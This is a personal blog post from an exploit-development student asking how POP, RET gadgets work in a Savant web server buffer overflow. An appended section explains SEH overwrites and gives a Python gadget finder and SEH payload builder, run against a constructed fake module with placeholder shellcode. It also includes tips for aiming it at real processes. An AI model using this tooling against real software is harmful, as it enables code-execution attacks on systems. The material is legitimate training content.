Monday, May 30, 2011

Buffer Overflows

It has been a while since I posted anything; it has been a busy time. I have been able to sneak in some time to work on my OffSec skills. Hey, I am working on it.

Anyway, to prepare for the OSCE course, I am looking through the www.exploit-db.com site and trying to re-exploit the applications that are available using Python. I like Python a lot and am trying to get better at it, so it looked like the obvious choice. I am running into some confusion on the Savant 3.1 Web Server. I understand that when exploiting SEH, we are looking for a POP, POP, RET. I understand that when you have a stack exploit, you look for a JMP to a CPU register. But somehow I am getting lost on the POP, RET. Is it just the same logic behind SEH? Are we just popping the last entry in the stack and putting the last memory entry in EIP? I have reviewed the exploit code from http://www.exploit-db.com/exploits/10434/.

Also, there is a great tutorial on egg hunters and buffer overflows at http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html. Just a side note: this blog has helped me in the past to understand SEH exploits, along with the site https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/. That site is incredible too. If you want to know about buffer overflows, these are the sites to go to.

Anyway, I am kind of stuck right now, but the irony is that the person who found the vulnerability in Savant is Muts, teacher and founder of OffSec and of the OSCP and OSCE courses. I know I have a lot of learning in store for me with the OSCE. Hopefully I can make some more headway with this.

On a more depressing note, I am sure I cannot afford any of the big CONs this year like I had planned, if I want to take the OSCE course and move by next year. But the good news is that I am sure there will be great CONs then too.
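The post contrasts the two gadget hunts it mentions (a POP, POP, RET for an SEH overwrite versus a JMP ESP style jump for a plain stack overflow). The script below is an added example written for this page in the Python the post is working in; it is not code from the post, from the Savant exploit, or from the linked tutorials. It scans a blob of x86 code for both kinds of gadget, rejects addresses containing bad characters, and lays out the classic nSEH/SEH buffer. The module bytes and the base address 0x10101000 are constructed for the demo and correspond to no real DLL. The reason a POP, POP, RET works is a fact of the 32-bit Windows SEH dispatcher, not of the stack in general: a handler is called with [ESP] = return address, [ESP+4] = pointer to the EXCEPTION_RECORD and [ESP+8] = pointer to the EXCEPTION_REGISTRATION_RECORD (the nSEH slot the overflow overwrote), so two pops discard the first two slots and the RET lands EIP on nSEH, where a short jump over the handler address leads into the shellcode.

```python
"""Gadget search for SEH and plain stack overflows (added example, not the
post's own code).  The "module" image and base address are constructed."""
import struct

# Single-byte x86 opcodes for POP r32.  0x5C (POP ESP) is left out on
# purpose: it changes the stack pointer instead of just discarding a slot.
POP_R32 = {0x58: "eax", 0x59: "ecx", 0x5A: "edx", 0x5B: "ebx",
           0x5D: "ebp", 0x5E: "esi", 0x5F: "edi"}

# Two-byte sequences that transfer control to the stack for a plain
# EIP overwrite: JMP ESP, CALL ESP, PUSH ESP ; RET.
STACK_PIVOTS = {b"\xff\xe4": "jmp esp",
                b"\xff\xd4": "call esp",
                b"\x54\xc3": "push esp ; ret"}


def _has_bad_chars(addr, bad_chars):
    """True if the little-endian encoding of addr contains a bad character."""
    return any(c in bad_chars for c in struct.pack("<I", addr))


def _ret_len(blob, i):
    """Length of a RET starting at blob[i]: 1 for C3, 3 for C2 imm16, else 0."""
    if i >= len(blob):
        return 0
    if blob[i] == 0xC3:
        return 1
    if blob[i] == 0xC2 and i + 2 < len(blob):
        return 3
    return 0


def find_pop_pop_ret(blob, base, bad_chars=b"\x00"):
    """Return [(address, text)] for every POP r32 ; POP r32 ; RET gadget.

    At SEH handler entry the stack is [ret][ExceptionRecord*][EstablisherFrame*],
    so pop ; pop ; ret sets EIP to EstablisherFrame, i.e. the overwritten nSEH.
    """
    hits = []
    for i in range(len(blob) - 2):
        b0, b1 = blob[i], blob[i + 1]
        if b0 not in POP_R32 or b1 not in POP_R32:
            continue
        rlen = _ret_len(blob, i + 2)
        if rlen == 0 or _has_bad_chars(base + i, bad_chars):
            continue
        if rlen == 1:
            ret = "ret"
        else:  # RET imm16: pops an extra imm16 bytes after the return address
            ret = "ret 0x%x" % struct.unpack_from("<H", blob, i + 3)[0]
        hits.append((base + i, "pop %s ; pop %s ; %s" % (POP_R32[b0], POP_R32[b1], ret)))
    return hits


def find_jmp_esp(blob, base, bad_chars=b"\x00"):
    """Return sorted [(address, text)] for JMP ESP / CALL ESP / PUSH ESP ; RET."""
    hits = []
    for pattern, text in STACK_PIVOTS.items():
        start = 0
        while True:
            i = blob.find(pattern, start)
            if i < 0:
                break
            if not _has_bad_chars(base + i, bad_chars):
                hits.append((base + i, text))
            start = i + 1
    return sorted(hits)


def build_seh_payload(offset_to_nseh, ppr_addr, shellcode, total, filler=b"A"):
    """Classic SEH layout: [junk][nSEH: EB 06 90 90][SEH: P/P/R addr][shellcode].

    EB 06 is a 2-byte short jump; +6 from its end skips the 4-byte SEH slot
    and lands on the first shellcode byte.
    """
    buf = filler * offset_to_nseh + b"\xeb\x06\x90\x90" + struct.pack("<I", ppr_addr) + shellcode
    if len(buf) > total:
        raise ValueError("payload of %d bytes exceeds buffer of %d" % (len(buf), total))
    return buf.ljust(total, filler)


def _build_sample():
    """Constructed fake module image, 0x30 bytes of NOPs with gadgets dropped in."""
    code = bytearray(b"\x90" * 0x30)
    code[0x00:0x03] = b"\x5e\x5b\xc3"          # pop esi ; pop ebx ; ret   (address 0x10101000 has a null)
    code[0x10:0x12] = b"\xff\xe4"              # jmp esp
    code[0x12:0x15] = b"\x5c\x5d\xc3"          # pop esp ; pop ebp ; ret   (rejected: POP ESP pivots)
    code[0x20:0x25] = b"\x5f\x5e\xc2\x04\x00"  # pop edi ; pop esi ; ret 4
    code[0x25:0x27] = b"\x54\xc3"              # push esp ; ret
    code[0x27:0x2a] = b"\x58\x59\xc3"          # pop eax ; pop ecx ; ret
    return bytes(code)


SAMPLE_BASE = 0x10101000   # constructed, not a real load address
SAMPLE_CODE = _build_sample()

if __name__ == "__main__":
    for addr, text in find_pop_pop_ret(SAMPLE_CODE, SAMPLE_BASE):
        print("SEH gadget   0x%08x  %s" % (addr, text))
    for addr, text in find_jmp_esp(SAMPLE_CODE, SAMPLE_BASE):
        print("stack pivot  0x%08x  %s" % (addr, text))
    ppr = find_pop_pop_ret(SAMPLE_CODE, SAMPLE_BASE)[0][0]
    print(build_seh_payload(4, ppr, b"\xcc" * 8, 32))
```

Run on a real target you would feed the script the code section of a module the process has loaded (preferably one without SafeSEH, rebasing, or ASLR) and the bad-character set you established for the input you control; the null-byte filter above is why the gadget at the start of the sample image is dropped even though it is a perfectly good POP, POP, RET.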
